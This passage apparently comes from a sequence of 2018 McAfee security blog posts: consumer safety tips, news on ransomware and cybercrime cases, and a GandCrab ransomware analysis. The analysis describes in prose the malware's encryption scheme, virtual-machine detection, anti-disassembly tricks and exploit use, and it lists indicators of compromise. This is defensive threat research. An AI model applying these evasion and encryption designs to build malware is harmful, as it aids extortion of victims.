4.  Beware of campus crooks. Thieves troll college campuses looking for opportunities to steal smartphones, laptops, wearables, and tablets for personal use or resale. Don’t carry your tech around uncased or leave it unguarded. Conceal it in a backpack. Even if you feel comfortable in your new community, don’t leave your phone even for a few seconds to pick up your food or coffee at a nearby counter. If you are in the library or study lab and need a bathroom break, take your laptop with you. Thieves are swift, and you don’t want to lose a semester’s worth of work in a matter of seconds.

5. Use public Wi-Fi with caution. Everyone loves to meet at the coffee shop for study sessions — and that includes hackers. Yes, it’s convenient, but use public Wi-Fi with care. Consider using VPN software, which creates a secure private network and blocks people from accessing your laptop or activity. To protect yourself, be sure to change your passwords often. This is easy if you use a free password manager like True Key.

6. Social media = productivity killer. Be aware of your online time. Mindless surfing, internet games, and excessive video gaming with roommates can have an adverse effect on your grades as well as your mental health.  Use online website blockers to help protect your study time.

7. Social media = career killer. We can all agree: College is a blast. However, keep the party photos and inappropriate captions offline. Your career will thank you. Remember: Most everything you do today is being captured or recorded – even if you’re not the one with the camera. The internet is forever, and a long-forgotten photo can make it’s way back around when you least expect it.

8. Don’t get too comfortable too fast. Until you understand who you can trust in your new community, consider locking your social media accounts. Disable GPS on mobile apps for security, don’t share home and dorm addresses, email, or phone numbers. While it may be the farthest thing from your mind right now — campus stalking case are real.

toni page birdsong

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post College Bound? 7 Important Technology Habits for Students appeared first on McAfee Blogs.

Hackers Tee Up a Ransomware Attack for the PGA Ahead of the 2018 Championship

Fore! That’s not a ball hitting the 9th hole, that’s a ransomware attack. You heard correctly – the PGA (Professional Golfers’ Association) was hit with a ransomware attack this week, just days ahead of its annual championship tournament. Specifically, the attack was on the PGA’s computer servers, and is keeping officials from accessing files, such as numerous PGA banners, logos, and signage, for the PGA Championship 2018.

Though it’s unsure how the crooks were able to get inside the PGA’s system, they have made their motives clear. Per Golfweek’s report, the cybercriminals left a message for the PGA staff, stating, “Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm.” “Any attempt to break the encryption could cause the loss of all of the work. This may lead to the impossibility of recovery of certain files,” the message threatened. They also included a Bitcoin wallet number for the PGA, however, the organization has yet to put anything in there.

That means, as of now, the PGA is still without access to a few of their promotional materials as their tournament is underway. However, the 2018 championship is still carrying on successfully, as planned.

Now, what can we take away from this situation? The tournament is still running smoothly, even despite the disruption from hackers. So, take a page out of PGA’s book – stand up to cybercriminals and don’t pay the ransom. Beyond not paying the ransom, here are a few additional security tips to follow if you’re ever faced with a ransomware attack on your personal device:

  • Keep your devices up-to-date. Though it’s not exactly known how cybercriminals gained access to the PGA’s systems, usually, ransomware attacks depend on a known vulnerability. So, make sure you update your devices’ software early and often, as patches for flaws are typically included in each update.
  • Do a complete backup. With ransomware attacks locking away crucial data, you need to back up the data on all of your machines. If a machine becomes infected with ransomware, there’s no promise you’ll get that data back – it could even become wiped entirely in some cases. Therefore, make sure you cover all your bases and have your data stored on an external hard drive or in the cloud.
  • Use decryption tools. No More Ransom, an initiative McAfee is a part of, has a suite of tools to free your data, each tailored for a specific type of ransomware. If your device gets held for ransom, start by researching what type of ransomware it is. Then check out No More Ransom’s decryption tools and see if one is available for your specific strain of ransomware.
  • Use comprehensive security. To be prepared for ransomware or any other type of cyberattack that may come your way, it’s important you lock down all your devices with an extra layer of security. To do just that, use a comprehensive security solution.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Hackers Tee Up a Ransomware Attack for the PGA Ahead of the 2018 Championship appeared first on McAfee Blogs.

Three men arrested for stealing over 15 million payment cards

US officials announced today that three alleged leaders of the cybercrime group known alternatively as Fin7, Carbanak and the Navigator Group have been arrested in Germany, Poland and Spain and charged with 26 felony counts. The charges include conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft. The Department of Justice alleges that Fin7 members have targeted more than 100 US companies, hacked thousands of computer systems and stolen 15 million credit and debit card numbers. The group is said to have breached networks in 47 states and Washington, DC and hacked 6,500 point-of-sale terminals at over 3,600 business locations.

Source: Department of Justice

GandCrab Ransomware Puts the Pinch on Victims

Update: On August 9 we added our analysis of Versions 4.2.1 and 4.3. 

The GandCrab ransomware first appeared in January and has been updated rapidly during its short life. It is the leading ransomware threat. The McAfee Advanced Threat Research team has reverse engineered Versions 4.0 through 4.3 of the malware.

The first versions (1.0 and 1.1) of this malware had a bug that left the keys in memory because the author did not correctly use the flags in a crypto function. One antimalware company released a free decryption tool, posted on NoMoreRansom.org, with help of Romanian police and Europol.

The hack was confirmed by the malware author in a Russian forum:

Figure 1. Confirmation by the author of the hack of GandCrab servers.

The text apologizes to partners for the hack and temporarily shuts down the program. It promises to release an improved version within a few days.

The second version of GandCrab quickly appeared and improved the malware server’s security against future counterattacks. The first versions of the ransomware had a list of file extensions to encrypt, but the second and later versions have replaced this list with an exclusion list. All files except those on the list were encrypted.

Old versions of the malware used RSA and AES to encrypt the files, and communicated with a control server to send the RSA keys locked with an RC4 algorithm.

The GandCrab author has moved quickly to improve the code and has added comments to mock the security community, law agencies, and the NoMoreRansom organization. The malware is not professionally developed and usually has bugs (even in Version 4.3), but the speed of changes is impressive and increases the difficulty of combating it.

Entry vector

GandCrab uses several entry vectors:

  • Remote desktop connections with weak security or bought in underground forums
  • Phishing emails with links or attachments
  • Trojanized legitimate programs containing the malware, or downloading and launching it
  • Exploits kits such as RigEK and others

The goal of GandCrab, as with other ransomware, is to encrypt all or many files on an infected system and insist on payment to unlock them. The developer requires payment in cryptocurrency, primarily DASH, because it complex to track, or Bitcoin.

The malware is usually but not always packed. We have seen variants in .exe format (the primary form) along with DLLs. GandCrab is effectively ransomware as a service; its operators can choose which version they want.

Version 4.0

The most important change in Version 4.0 is in the algorithm used to encrypt files. Earlier versions used RSA and AES; the latest versions use Salsa20. The main reason is for speed. RSA is a powerful but slow algorithm. Salsa20 is quick and the implementation is small.

The ransomware checks the language of the system and will not drop the malicious payload if the infected machine operates in Russian or certain other former Soviet languages:

Figure 2. Checking the language of the infected system.

GandCrab encrypts any file that does not appear on the following file-extension exclusion list:

The ransomware does not encrypt files in these folders:

GandCrab leaves these files unencrypted:

The ransomware generates a pair of RSA keys before encrypting any file. The public key encrypts the Salsa20 key and random initialization vector (IV, or nonce)) generated later for each file.

The encryption procedure generates a random Salsa20 key and a random IV for each file, encrypts the file with them, and encrypts this key and IV with a pair of RSA keys (with the public RSA key created at the beginning). The private key remains encrypted in the registry using another Salsa20 key and IV encrypted with an RSA public key embedded in the malware.

After encryption, the file key and IV are appended to the contents of the file in a new field of 8 bytes, increasing the original file size.

This method makes GandCrab very strong ransomware because without the private key to the embedded public key, it is not possible to decrypt the files. Without the new RSA private key, we cannot decrypt the Salsa20 key and IV that are appended to the file.

Finally, the ransomware deletes all shadow volumes on the infected machine and deletes itself.

Version 4.1

This version retains the Salsa20 algorithm, fixes some bugs, and adds a new function. This function, in a random procedure from a big list of domains, creates a final path and sends the encrypted information gathered from the infected machine. We do not know why the malware does this; the random procedure usually creates paths to remote sites that do not exist.

For example, one sample of this version has the following hardcoded list of encrypted domains. (This is only a small part of this list.)

The ransomware selects one domain from the list and creates a random path with one of these words:

Later it randomly chooses another word to add to the URL it creates:

Afterward it makes a file name, randomly choosing three or four combinations from the following list:

Finally the malware concatenates the filename with a randomly chosen extension:

At this point, the malware sends the encrypted information using POST to the newly generated URL for all domains in the embedded list, repeating the process of generating a path and name for each domain.

Another important change in this version is the attempt to obfuscate the calls to functions such as VirtualAlloc and VirtualFree.

Figure 3. New functions to obfuscate the code.

Version 4.1.2

This version has appeared with some variants. Two security companies revealed a vaccine to prevent infections by previous versions. The vaccine involved making a special file in a folder with a special name before the ransomware infects the system. If this file exists, the ransomware finishes without dropping the payload.

The file gets its name from the serial number of the Windows logic unit hard disk value. The malware makes a simple calculation with this name and creates it in the %appdata% or %program files% folder (based in the OS) with the extension .lock.

Figure 4. Creating the special file.

The GandCrab author reacted quickly, changing the operation to make this value unique and use the Salsa20 algorithm with an embedded key and IV with text referring to these companies. The text and the value calculated were used to make the filename; the extension remained .lock.

One of the security companies responded by making a free tool to make this file available for all users, but within hours the author released another Version 4.1.2 with the text changed. The malware no longer creates any file, instead making a mutex object with this special name. The mutex remains and keeps the .lock extension in the name.


Figure 5. Creating a special mutex instead of a special lock file.

The vaccine does not work with the second Version 4.1.2 and Version 4.2, but it does work with previous versions.

Version 4.2

This version has code to detect virtual machines and stop running the ransomware within them.

It checks the number of remote units, the size of the ransomware name running compared with certain sizes, installs a VectoredExceptionHandler, and checks for VMware virtual machines using the old trick of the virtual port in a little encrypted shellcode:

Figure 6. Detecting VMware.

The malware calculates the free space of the main Windows installation logic unit and finally calculates a value.

If this value is correct for the ransomware, it runs normally. If the value is less than 0x1E, it waits one hour to start the normal process. (It blocks automatic systems that do not have “sleep” prepared.) If the value is greater than 0x1E, the ransomware finishes its execution.

Figure 7. Checking for virtual machines and choosing a path.

Version 4.2.1

This version appeared August 1. The change from the previous version is a text message to the company that made the vaccine along with a link to a source code zero-day exploit that attacks one of this company’s products. The code is a Visual Studio project and can be easily recompiled. This code has folders in Russian after loading the project in Visual Studio.

Version 4.3

This version also appeared August 1. This version has several changes from previous versions.

  • It removes the code to detect virtual machines and a few other odd things in Version 4.2. This code had some failure points; some virtual machines could not be detected.
  • It implemented an exploit against one product of the antivirus company that made the vaccine against Version 4.0 through the first release of Version 4.1.2. This code appears after the malware encrypts files and before it deletes itself.

Figure 8. Running an exploit against a product of the company that made a vaccine.

  • New code in some functions makes static analysis with Interactive Disassembler more complex. This is an easy but effective trick: The ransomware makes a delta call (which puts the address of the delta offset at the top of the stack) and adds 0x11 (the size of the special code, meaning the malware author is using a macro) to the value in the ESP register. ESP now points to an address after the block of the special code and makes a jump in the middle of the opcodes of this block. This technique makes it appear like another instruction, in this case “pop eax,” which extracts the value after adding 0x11 from the top of the stack (ESP register). The code later makes an unconditional jump to this address in EAX. This way the ransomware follows its normal code flow.

Figure 9. New code to make static analysis more difficult.

Conclusion

GandCrab is the leading ransomware threat for any person or enterprise. The author uses many ways to install it—including exploits kits, phishing mails, Trojans, and fake programs. The developer actively updates and improves the code to make analysis more difficult and to detect virtual machines. The code is not professionally written and continues to suffer from bugs, yet the product is well promoted in underground forums and has increased in value.

McAfee detects this threat as Ran-GandCrab4 in Versions 4.0 and later. Previous ones are also detected.

Indicators of compromise

MITRE ATT&CK

This sample uses the following MITRE ATT&CK techniques:

  • File deletion
  • System information discovery
  • Execution through API
  • Execution through WMIC
  • Application process discovery: to detect antimalware and security products as well as normal programs
  • Query registry: to get information about keys that the malware needs make or read
  • Modify registry
  • File and directory discovery: to search for files to encrypt
  • Encrypt files
  • Process discovery: enumerating all processes on the endpoint to kill some special ones
  • Create files
  • Elevation of privileges

Hashes

  • 9a80f1866450f2f10fa69b1eb8747c344d6ef038468014c59cc50497f9e4675d – version 4.0
  • d9466be5c387eb2fbf619a8cd0922b167ea7fa06b63f13cd330ca974cae1d513 – version 4.0
  • 43b57d2b16c44041916f3b0562712d5dca4f8a42bc00f00a023b4a0788d18276 – version 4.0
  • 786e3c693fcdf55466fd6e5446de7cfeb58a4311442e0bc99ce0b0985c77b45d – version 4.0
  • f5e74d939a5b329dddc94b75bd770d11c8f9cc3a640dccd8dff765b6997809f2 – version 4.1
  • 8ecbfe6f52ae98b5c9e406459804c4ba7f110e71716ebf05015a3a99c995baa1 – version 4.1
  • e454123d852e6a40eed1f2552e1a1ad3c00991541d812fbf24b70611bd1ec40a – version 4.1
  • 0aef79fac6331f9eca49e711291ac116e7f6fbaeb5a1f3eb7fea9e2e4ec6a608 – version 4.1
  • 3277c1649972ab5b43ae9e87087b70ea4825956bfdddd1034f7b0680e6d46efa – version 4.1
  • a92af825bd95b6514f22dea08a4eb6d3491cbad45e69a5b9653b0148ee9f9832 – version 4.1
  • ce093ffa19f020a2b73719f653b5e0423df28ef1d59035d55e99154a85c5c668 – version 4.1.2 (first)
  • a1aae5ae7a3722b83dc1c9b0831c973641b246808de4f3670f2fd916cf498d38 – version 4.1.2 (second)
  • 3b0096d6798b1887cffa1288583e93f70e656270119087ceb2f832b69b89260a – version 4.2
  • e8e948e36fed93061062406693d1b2c402dd8e5788506bfbb50dbd86a5540829 – version 4.2

Domain

http://gandcrabmfe6mnef.onion

The post GandCrab Ransomware Puts the Pinch on Victims appeared first on McAfee Blogs.

Six Things your Enterprise Needs to Learn from the DNC Hacking Indictment

All politics aside, the United States Department of Justice on Friday unsealed a judicial indictment against a number of individuals alleged to be from Russia’s intelligence services engaged in activities in 2016.

Stepping outside of the context of this party or that party, and politics as a whole – McAfee’s CTO, Steve Grobman noted, “Attribution is amongst the most complex aspects of cyberwar and the US government is in a unique position to make this attribution assessment.  Technical forensics combined with information from trusted intelligence or law enforcement agencies are needed to provide confidence behind identifying actors in an attack or campaign.  These indictments clearly show the US has reason to believe Russia interfered with the election process. “

The level of technical detail also offers practical insight for aspects of organizations’ readiness to react to the threat environment.

1) Nation State Activity is Real

At McAfee, we operate our own Advanced Threat Research.  We employ many professionals whose entire job it is to find ways to break things, to learn how others have already broken things, and to make decisions on the level of risk it represents to our customers and future customers.  Our hope is that our activity is both non-disruptive, ethically conducted, and consistent with our corporate values and our commitments to our customers.  In today’s threat environment, countries throughout the globe are investing in the cyber capabilities to practice intelligence, deception, counter intelligence, and in the past few years, we have documented the crossover from the cyber capability into kinetic effects.

While matters of one service’s actions versus another’s being perceived as “good” or “bad”, a matter of “criminal conspiracy” or “policy” involves many factors and points of view, as a profession it is critical that we recognize this rapidly growing reality for the fact that it is.

This judicial action is another breadcrumb reminding us as enterprise leaders that sophisticated adversaries need resources to act, especially those enterprises involved in services to organizations of public importance.  Organizations should evaluate their customer base, and the services that they provide for relative risks.  Risk has upside opportunity (“Revenue”) but should also prompt questions internally as to whether an organization or subset requires advanced security controls, or more proactive threat detection and resistance measures.

2) Geo-Location is Practically Irrelevant

For many professionals engaged in the early days of information security, we could leverage aspects of connection metadata to make snap judgements about the trustworthiness of requests.  The days of first-jump relays to command and control servers going to a given country’s public IP space or a two- letter country-associated domain are mostly over.

Instead, the organization needs to transition, looking more directly at the behavior of not just users, but of systems, and the access of resources.  At McAfee, we have evolved our own offerings in this space to establish McAfee Behavioral Analytics to discern elevated risks that break established patterns and to put advanced tools like McAfee Investigator in the hands of threat hunters.

Whether using our products or not, today’s enterprise needs to rely on security behaviors that do not look for traditional geographic or demographic identifiers as a means of making a strong determination of trust for access and/or threat identification.

When it comes to identify mis-use, where multi-factor authentication is possible, it should be implemented, with a decreased emphasis on means which are easily open to interception by opponents (like SMS based message codes).  Yubikey, TOTP based generators, and interactive application confirmation by providers like Duo Security are all effective measures to make it more difficult to apply credentials intercepted or cajoled from end users by other means.

3) URL Shorteners can be a Risk Indicator

While for many organizations – especially in the realm of social media analytics – the use of URL shorteners has enabled short-format messaging with business intelligence potential, they are often a means to obscure potentially malicious targets.  The indictment released by the United States Department of Justice highlights the continuing threat that the combination of URL Shortening and the user-focused technique of Spear Phishing continue to present as a means to attack the enterprise.

Aside from education campaigns to help users distinguish legitimate links and to help them become more sensitive to the risk, the organization can also consider web access methods for greater control and recognition of potential threats.

Systems like User Entity Behavioral Analytics (UEBA) can identify outlier websites not otherwise accessed at the organization and the presence or use of unknown URL shorteners can itself be a risk indicator.  The security operations team may want to look at the identification/risk management of certain URL shorteners over time to aid in determining which become commonly seen in the wild in the organization’s recent incidents, and thus could or should be managed in email and web access hygiene.

4) Vulnerability Management is a Key Risk Mitigation

I’ve never known a security professional who skips into the office with their coffee and announces, “I love patching servers.”  Never.  As experienced security leaders, we know how hard it can be to manage the impact to production systems, to identify system owners, to work together to maintain a cadence of patching.  Sometimes, even just the heterogeneous nature of the modern operating environment can be its own challenge!

The alleged activity of the identified conspirators reminds us how critical the public attack surface remains in protecting the enterprise as a whole.  Try as we might, each of our public infrastructure will maintain a footprint.  We “leak” details of our enterprise systems as a necessary byproduct of creating the ability for those systems to technically operate.  DNS Records.  Public IP block ownership.  Routing advertisements.  Job listings.  Employee CVs.  Employee social media profiles.

Vulnerability management requires an organization to think about more than patching.  Your organization’s threat surface has to be considered in a broader sense to manage holistic threat consideration and remediation.  The organization can also use public models as a means to check the organization’s readiness to defend against new vulnerabilities ahead of patching or other long-term remediation.

5) Response Threat Hunting is Hard – Trust Nothing

Despite the best efforts of technical security teams, sometimes intelligence and cues are missed.  The reality is that sophisticated adversaries have sophisticated skills and multiple means to stay engaged.  They also have reason and/or desire to hide from security teams.  As security professionals, we have to put personal ego and hubris aside.  Threat hunting in an incident is a time for humble approaches that recognize the adversaries are at or above our own skill level (and hope that is not the case).

In such a case, we go back to a few core fundamentals: we trust nothing.  We require validation for everything.  Each piece of intelligence goes into the picture, and through our tools to identify additional leads to pursue, and is evaluated for potential remediate actions made possible.  While we have talked at length prior about the cyber kill chain, a fundamental truth illustrated in today’s Department of Justice action is that where advanced activity occurs, the entire environment needs to be suspected and become zero trust.

Can you force each network flow to be validated for a time?  Can someone form the organization vouch for a piece of software or a specific node on the network?  Do your pre-work ahead of time to create the space so that when company brand is on the line, you can use maintenance windows, incident response policies, and similar corporate buffers to buy the “right” to shut down a segment, temporarily block a network flow and see what happens, etc.

6) Your organizational data is in the cloud. Your Incident Response needs to be, too.

The cloud was a key opportunity for the organizations compromised in these activities to continue to lose information.  Indications are that when the identity and initial incident was addressed “on premise”, the cloud systems were not connected to those changes.

Your organization has leveraged the advanced capability and time to market of the cloud.  Our recent survey of organizations worldwide indicates that the typical enterprise class organization has dozens of distinct providers hosting corporate data.  Just as your sensitive information may be stored in those providers, yet is part of your brand value and your delivery strategy, your response plans need to integrate intelligence from those providers – and to those providers – for investigation and mitigation.

Building unified visibility across cloud providers requires a deliberate approach and investment from the organizations.  Incident response procedures should include looking at cloud sources for activity from potential Indicators of Compromise, as well as an incident step of considering what actions are needed to manage the risk in cloud providers.

Your cloud is part of your holistic data and threat stance, it also needs to be part of your remediation and resilience plan.

Nation State Actors Remind us of the Fundamentals

The indictment released by the United States Department of Justice describes a multi-faceted effort that involved target research, user-focused phishing, exploiting vulnerable software, malware, and making use of the disconnect between on-premise and cloud management.

For literally years, McAfee has focused on a platform approach to security in our products.  We offer software with advancements like OpenDXL and an actively managed ecosystem of Security Innovation Alliance offerings.  We make these investments for the simple reason that in order to protect and adapt to continuing threats, your organization needs rapidly available, actionable intelligence.  Your organization’s approach to information security should return periodically to verify fundamental information sharing and basic controls, even as advanced capabilities are implemented.

 

The post Six Things your Enterprise Needs to Learn from the DNC Hacking Indictment appeared first on McAfee Blogs.

Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break

It’s mind-blowing to think that when you become a parent, you have just 18 summers with your child before he or she steps out of the mini-van and into adulthood. So at the mid-summer point, it’s a great time to ask: How balanced is your child’s screen time?

Don’t panic, it’s normal for screen time to spike over the summer months, which is why kids not only know how to balance their screen time but why it’s important.

Besides impacting family time and relationships, there are other potential risks that can result from excessive screen time such as obesity, depression, technology addiction, and anxiety. Too, there are risks such as privacy, cyberbullying, inappropriate content, and predators. So, while summer brings fun, it also requires parents to be even more diligent — and creative — when it comes to helping kids achieve some degree of balance with their tech.

A Small, Powerful Step

Kids are connected. Forever. There’s no going backward. Not all changes take a huge effort. Small changes matter.

Try this one small but powerful change. Turn your phone over whenever anyone in your family enters a room or begins talking to you. The simple act of turning our screens face down and looking at the person speaking strengthened our family dynamic. Try it — you might experience some of the same results we did. The kids may stick around and talk longer. Your spouse may feel more respected. And, most importantly, you won’t miss the priceless smiles, expressions, laughter, and body language that comes with eye contact and being fully present with the people who mean the most.

Another small step is agreeing to screen free zones (this includes TV) such as the dinner table, restaurants, and during family outings. Again, this one small step might open up a fresh, fun family dynamic.

If you feel your summer slip sliding away and need to seriously pull in the tech reigns, these five tips may help.

5 Ways to Help Curb Summer Tech

  1. Create summer ground rules. Include your kids in this process and come up with a challenge rather than a list of rules. Ground rules for summer might look different from the rest of the year, depending on your family’s schedule. Establishing a plan for chores, exercise, reading and waking up, puts expectations in place. To keep the tech in check, consider a tech exchange. For every hour of screen time, require your child to do something else productive. Keep it fun: Set up a reward system for completed chores.
  2. Get intentional with time. Carving out time to be together in our tech-driven world requires intentionality. Try sitting down together and making a summer bucket list for the remainder of the summer. Try your hand at fishing, canoeing, or hiking some new trails together. Board games, crafts, puzzles, a family project are also ways to make great memories.
  3. Keep up with monitoring.  Just because it’s summer doesn’t mean you can ease up on monitoring online activity goes by the wayside. Keep up with your child’s favorite apps and understand how he or she is using them. During summer especially, know the friends your kids connect with online. Review privacy and location settings. Note: Kids — especially teens — want their friends to know what they are doing and where they are at all times in hopes of finding something to do over the summer. This practice isn’t always a good idea since location-based apps can open your family up to risks.
  4. Consider a tech curfew. Establish a “devices off” rule starting an hour before lights out. This won’t be a favorite move, but then again, parenting well isn’t always fun. More and more studies show the physical toll excessive technology use can take on teens. Just because your child is in bed at night does not mean he or she is asleep. The ability to face time, text, watch movies, or YouTube videos can zap kids of valuable sleep.
  5. Maintain a balanced perspective. Kids and tech are intertwined today, which makes it nearly impossible to separate the two. Sure the risks exist, but there’s the upside of tech that brings values that echo throughout every generation: Friendship, connection, and affirmation. Checking social media and sharing one’s thoughts and life online is a regular part of growing up today. Keep this in mind as you work together to find the balance that works best for your family.

toni page birdsong

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Family Tech Check: 5 Ways to Help Kids Balance Tech Over Summer Break appeared first on McAfee Blogs.

What Drives a Ransomware Criminal? CoinVault Developers Convicted in Dutch Court

How often do we get a chance to learn what goes on in the minds of cybercriminals? Two members of McAfee’s Advanced Threat Research team recently did, as they attended a court case against two cybercriminal brothers.

The brothers, Dennis and Melvin, faced a judge in Rotterdam, in the Netherlands. This case was one of the first in the world in which ransomware developers appeared in court and were convicted for creating and spreading ransomware.

They were responsible for creating the ransomware families CoinVault and BitCryptor. CoinVault, the better known of the two, made its appearance in late 2014. The technically skilled programmers had examined the source code of CryptoLocker, the notorious ransomware family that first struck in 2013. The brothers were not very impressed and agreed that they could do a better job. What might have started out as a fun technical challenge turned into a criminal business.

The CoinVault and BitCryptor campaigns were not as widespread as CTB-Locker, CryptoWall, or Locky ransomware campaigns. Nor did they profit as much from it, but this case is nevertheless uncommon. It is rare that the developers of ransomware are caught, let alone confess their crimes. This case gives us an opportunity to understand what drove them down a path to cybercrime.

The challenge

Why would someone write malicious code and infect thousands of people? The judge asked the brothers the same question. Their response was “Because it was a technical challenge.” “But didn’t you realize you were dealing with people?” the judge responded. Both brothers answered that they did not; they were dealing with computers and never met their victims face to face.

The judge and prosecutor did not accept their explanation. CoinVault had a built-in helpdesk function to directly communicate with their victims, thus registering their pleas. The brothers standard reaction was merciless: “Just pay the money; otherwise we won’t decrypt.” According to the prosecutor, they had plenty of opportunities to see the consequences of their actions but choose to ignore them for money.

At the trial they said they were sorry and tearfully regretted what they had done. But were these mere crocodile tears because they got caught? During CoinVault’s lifespan, several versions of the ransomware were released. Every new version was a reaction to blogs written by security researchers and takedowns performed by law enforcement. Instead of realizing that they were making a mistake and stopping, the brothers saw it as a challenge, a digital game of cat and mouse, and constantly improved their malicious code.

Their continuing to improve the ransomware shows a lack of empathy with their victims. Was there no one in their social surroundings who could straighten their moral compasses and talk sense into them?

The payment

A ransomware criminal must decide the amount of ransom to charge. Generally the more targeted a ransomware attack is, the higher the ransom demand will be. CoinVault’s infections were not targeted at one organization; they charged only US$250. The two brothers explained that they chose that price to be low enough for an average person to pay while still making a good profit. The prosecutor remarked ironically that they were “very noble [to keep] their ransom demand affordable.”

The infection

The two brothers did not directly infect their victims with ransomware; they took a multistep approach. Their distribution method was via newsgroup channels. They hooked a small piece of malicious code to known software or license-key generators before posting the software packages on the newsgroups. Once victims installed the package or ran the key generator, they would become part of a botnet through the software the brothers named Comhost, which can record keystrokes, search for credentials, and steal Bitcoin wallets. Comhost can also upload and execute binaries received from the control server they named Sonar. (We believe Sonar is modified a version of the popular Solar botnet software.)

The Sonar botnet panel.

Once they had accumulated enough bots, they simply pushed CoinVault to all their victims and locked thousands of computers at once. This method made it hard for victims to figure out how they were attacked, because weeks could pass between the initial infection and the encryption. By spreading their ransomware via newsgroups with pirated software, they discouraged victims from going to the police out of fear of prosecution and copyright-violation fines.

The CoinVault lock screen.

The arrest

In April 2015, The National High Tech Crime Unit of the Dutch Police seized the control servers for CoinVault. After the police investigated, the two brothers, aged 18 and 22 at the time, were arrested in Amersfoort, Netherlands, on September 14, 2015. Systems were infected not only in the Netherlands, but also in the United States, Germany, France, and the United Kingdom. Their mistakes? Using flawless Dutch in the ransom notes and one time they did not use a Tor connection to log in into their control server, instead using their home connection.

Flawless Dutch in the ransomware code.

Although they used an obfuscator tool (Confuser) for their code, in some of the samples the full name of one of the authors was present, because they did not clean up the debugging path.

Example:

 c:\Users\**********\Desktop\Coinvault\coinvault-cleaned\obj\Debug\coinvault.pdb

From grabbing keys to No More Ransom

During the investigation the Dutch police obtained all the decryption keys for CoinVault and partnered with the private sector to build a decryption tool for CoinVault ransomware, successfully mitigating a large portion of the damage caused by CoinVault. This effort idea gave birth to No More Ransom, an online portal supported by the public and private sector with the largest repository on the planet of free ransomware decryption tools. No More Ransom now has decryptors for 85 ransomware versions. This global initiative has prevented millions of dollars from falling into the hands of cybercriminals. McAfee is proud to be one of the founding members of No More Ransom.

Nomoreransom.org

The next steps

Extorting people with ransomware is wrong, and perpetrators must be held accountable. It is sad to see two talented young people choose a pathway to cybercrime and waste their skills—skills sorely needed in the cybersecurity sector. We hope they will have learned a lesson as they endure the consequences of their actions. The sentencing will take place in about two weeks. Perhaps after they serve their time, they will find someone willing to give them a second chance.

The post What Drives a Ransomware Criminal? CoinVault Developers Convicted in Dutch Court appeared first on McAfee Blogs.

Google Play Users Risk a Yellow Card With Android/FoulGoal.A

This blog post was co-written by Irfan Asrar.

English soccer fans have enthusiastically enjoyed the team’s current run in the World Cup, as the tune “Three Lions” plays in their heads, while hoping to end 52 years of hurt. Meanwhile a recent spyware campaign distributed on Google Play has hurt fans of the beautiful game for some time. Using major events as social engineering is nothing new, as phishing emails have often taken advantage of disasters and sporting events to lure victims.

“Golden Cup” is the malicious app that installs spyware on victims’ devices. It was distributed via Google Play, and “offered” the opportunity to stream games and search for records from the current and past World Cups. McAfee Mobile Security identifies this threat as Android/FoulGoal.A; Google has removed the malicious applications from Google Play.

Once Golden Cup is installed it appears to be a typical sporting app, with multimedia content and general information about the event. Most of this data comes from a web service without malicious activity. However, in the background and without user consent the app silently transfers information to another server.

Data captured

Golden Cup captures a considerable amount of encrypted data from the victim’s device:

  • Phone number
  • Installed packages
  • Device model, manufacturer, serial number
  • Available internal storage capacity
  • Device ID
  • Android version
  • IMEI, IMSI

This spyware may be just the first stage of a greater infection due to its capability to load dex files from remote sources. The app connects to its control server and tries to download, unzip, and decrypt a second stage.

Android/FoulGoal.A detects when the screen is on or off and records this in its internal file scrn.txt, with the strings “on” or “off” to track when users are looking at their screens:

The Message Queuing Telemetry Transport protocol serves as the communication channel between the device and the malicious server to send and receive commands.

Data encryption

User data is encrypted with AES before it is sent to the control server. Cryptor class provides the encryption and decryption functionality. The doCrypto function is defined as a common function. As the first parameter of the function, “1” represents encryption and “2” is decryption mode:

The encryption key is generated dynamically using the SecureRandom function, which generates a unique value on the device to obfuscate the data. The addKey function embeds the encryption key into the encryption data. The data with the key is uploaded to the control server.

We believe the malware author uses this AES encryption technique for any information to be uploaded to escape the detection by Google Bouncer and network inspection products.

Our initial analysis suggests there were at least 300 infections, which we suspect occurred between June 8‒12, before the first World Cup matches began.

The second round

The second phase of the attack leverages an encrypted dex file. The file has a .data extension and is downloaded and dynamically loaded by the first-stage malware; it is extracted with the same mechanism used to upload the encrypted files. The location of the decryption key can be identified from the size of the contents and a fixed number in the first-stage malware.

After decryption, we can see out.dex in zipped format. The dex file has spy functions to steal SMS messages, contacts, multimedia files, and device location from infected devices.

The control server in second stage is different from the first stage’s. The encryption methodology and the server folder structures on the remote server are identical to the first stage.

We found one victim’s GPS location information and recorded audio files (.3gp) among the encrypted data on the control server.

Variants

We have also discovered two other variants of this threat created by the same authors and published to Google Play as dating apps. Although all the apps have been removed from Google Play, we still see indications of infections from our telemetry data, so we know these apps are active on some users’ devices.

Our telemetry data indicates that although users around the world have downloaded the app, the majority of downloads took place in the Middle East, most likely as a result of a World Cup–themed Twitter post in Hebrew directing people to download the app for a breakdown of the latest events.

McAfee Mobile Security users are protected against all the variants of this threat, detected as   Android/FoulGoal.A.

The post Google Play Users Risk a Yellow Card With Android/FoulGoal.A appeared first on McAfee Blogs.

Major International Airport’s Security System Found for Sale on Dark Web RDP Shop

The closest many of us get to the dark web is watching hackers surf it in television shows or movies. However, it is a very real place that contains lots of stolen data. This data, along with compromised systems, devices, and more are often sold in underground marketplaces that exist on the dark web. One type of marketplace is called a remote desktop protocol (RDP) shop, which provides access to stolen systems for a small fee. Found in one of these RDP shops by McAfee’s ATR team: a major international airport’s security and building automation systems, which could be purchased for only $10 USD.

You might be wondering – what does “access” mean in this scenario? Just like Spotify and Apple Music sell access to artist’s songs, or a gym sells access to their exercise machines, the dark web can sell remote access to hacked machines through these RDP shops. Once access is purchased, crooks can obtain logins to a victim’s computer system and essentially have full control of it.

Now, the McAfee ATR team is not exactly sure how the cybercriminals got their hands on these systems. But they do know that once something like an airport security system is purchased, crooks can do serious damage. This access could allow cybercriminals to do essentially anything they want – create false alerts to the internal security team, send spam, steal data and credentials, mine for cryptocurrency, or even conduct a ransomware attack on the organization.

